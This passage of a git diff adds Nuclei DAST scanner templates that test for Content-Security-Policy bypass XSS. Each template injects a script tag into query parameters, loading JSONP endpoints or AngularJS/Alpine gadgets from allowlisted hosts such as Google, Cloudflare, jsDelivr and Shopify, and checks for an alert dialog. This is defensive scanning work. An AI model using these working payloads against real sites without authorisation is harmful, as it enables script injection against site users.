+      - type: dsl
+        dsl:
+          - "cas_criteo_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml
new file mode 100644
index 00000000000..2ef7e508ab0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cdn-arkoselabs-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Arkose Labs CDN
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,arkoselabs
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://cdn.arkoselabs.com/fc/a/?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cdn_arkoselabs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "cdn_arkoselabs_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml
new file mode 100644
index 00000000000..0a1a772742c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cdn-jsdelivr-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via jsDelivr CDN
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,jsdelivr
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://cdn.jsdelivr.net/gh/renniepak/xss/xss.js"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cdn_jsdelivr_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "cdn_jsdelivr_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml
new file mode 100644
index 00000000000..9633102d173
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cdn-shopify-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Shopify CDN
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,shopify
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://cdn.shopify.com/s/files/1/0714/7936/1848/files/a.js"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cdn_shopify_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "cdn_shopify_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml
new file mode 100644
index 00000000000..2cb5b931a7a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cdn-syncfusion-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Syncfusion CDN
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,syncfusion
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://cdn.syncfusion.com/js/assets/external/angular.min.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cdn_syncfusion_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "cdn_syncfusion_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml
new file mode 100644
index 00000000000..3b41073cfe6
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cdnjs-cloudflare-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Cloudflare CDNJS
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,cloudflare
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://cdnjs.cloudflare.com/ajax/libs/alpinejs/3.10.5/cdn.min.js"></script><div x-init="alert(1)">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cdnjs_cloudflare_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "cdnjs_cloudflare_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml
new file mode 100644
index 00000000000..dd1d03c6088
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: challenges-cloudflare-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Cloudflare Challenges
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,cloudflare
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: challenges_cloudflare_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "challenges_cloudflare_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml
new file mode 100644
index 00000000000..f19e169a728
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: chartbeat-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Chartbeat API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,chartbeat
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.chartbeat.com/toppages/?jsonp=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: chartbeat_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "chartbeat_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml
new file mode 100644
index 00000000000..e1321d3dc8e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: client-api-arkoselabs-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Arkose Labs Client API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,arkoselabs
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://client-api.arkoselabs.com/fc/a/?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: client_api_arkoselabs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "client_api_arkoselabs_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml
new file mode 100644
index 00000000000..cd897434b83
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: client-crisp-chat-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Crisp Chat Client
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,crisp
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://client.crisp.chat/settings/website/x/?callback=-alert(1);/*"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: client_crisp_chat_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "client_crisp_chat_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml
new file mode 100644
index 00000000000..192f40c720a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: clients1-google-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Clients1
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="http://clients1.google.com/complete/search?callback=alert&q=PIC&nolabels=t&client=youtube&ds=yt&_=1361575554883"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: clients1_google_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "clients1_google_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml
new file mode 100644
index 00000000000..2e869168bd1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: code-angularjs-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via AngularJS CDN
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,angularjs
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://code.angularjs.org/1.8.2/angular.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: code_angularjs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "code_angularjs_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml b/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml
new file mode 100644
index 00000000000..acb17ad55fd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: commerce-coinbase-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Coinbase Commerce
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,coinbase
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://commerce.coinbase.com/v1/checkout.js?onload=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: commerce_coinbase_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "commerce_coinbase_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml b/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml
new file mode 100644
index 00000000000..6a3e564d43e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: common-like-naver-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Naver Like
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,naver
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://common.like.naver.com/v1/search/contents?callback=alert&q=x"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: common_like_naver_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "common_like_naver_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml b/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml
new file mode 100644
index 00000000000..bb9448436bf
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: connect-mail-ru-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Mail.ru Connect
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,mailru
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://connect.mail.ru/share_count?url_list=x&callback=1&func=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: connect_mail_ru_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "connect_mail_ru_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml
new file mode 100644
index 00000000000..b5c9ce53bc2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: content-akamai-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Akamai Content
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,akamai
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://content.akamai.com/index.php/form/getForm?munchkinId=113-DTN-266&form=1402&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: content_akamai_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "content_akamai_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml
new file mode 100644
index 00000000000..2b6fe919e85
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cse-google-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Custom Search
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://cse.google.com/cse/element/v1?cx=000470283453218169915:hcrzdwsiwrc&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cse_google_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "cse_google_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml
new file mode 100644
index 00000000000..6670f774a92
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cxense-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Cxense API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,cxense
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.cxense.com/profile/user/segment?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cxense_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "cxense_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml b/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml
new file mode 100644
index 00000000000..a12d28c22e0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: d-adroll-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via AdRoll
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,adroll
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://d.adroll.com/user_attrs?advertisable_eid=5L5IV3X4ZNCUZFMLN5KKOD&jsonp=alert(document.domain)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: d_adroll_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "d_adroll_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml b/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml
new file mode 100644
index 00000000000..390bffe9793
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: d1xrp9zhb3ks3c-cloudfront-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via CloudFront
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,cloudfront
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://d1xrp9zhb3ks3c.cloudfront.net/web/changessalon/node_modules/angular/angular.min.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: d1xrp9zhb3ks3c_cloudfront_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "d1xrp9zhb3ks3c_cloudfront_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml
new file mode 100644
index 00000000000..7bd93e8cbd0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: dailymotion-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Dailymotion API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,dailymotion
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.dailymotion.com/video/x5gv6be?callback=alert()"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: dailymotion_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "dailymotion_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml
new file mode 100644
index 00000000000..41aff8535af
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: dblp-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via DBLP
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
